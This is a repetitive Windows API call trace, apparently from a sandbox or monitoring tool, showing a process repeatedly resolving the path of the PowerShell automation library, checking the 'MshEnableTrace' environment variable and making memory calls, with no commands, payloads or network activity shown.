[0081.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.307] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.310] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.310] CoTaskMemFree (pv=0x2c7570)
[0081.322] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.324] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.324] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.325] CoTaskMemFree (pv=0x2c7570)
[0081.325] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.325] CoTaskMemFree (pv=0x2c7570)
[0081.325] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.325] CoTaskMemFree (pv=0x2c7570)
[0081.326] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.326] CoTaskMemFree (pv=0x2c7570)
[0081.334] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.334] CoTaskMemFree (pv=0x2c7570)
[0081.334] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.334] CoTaskMemFree (pv=0x2c7570)
[0081.336] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.337] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.488] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.492] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.492] CoTaskMemFree (pv=0x2c7570)
[0081.728] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2c79b0
[0081.753] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2c7ac0
[0081.931] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.979] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.980] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
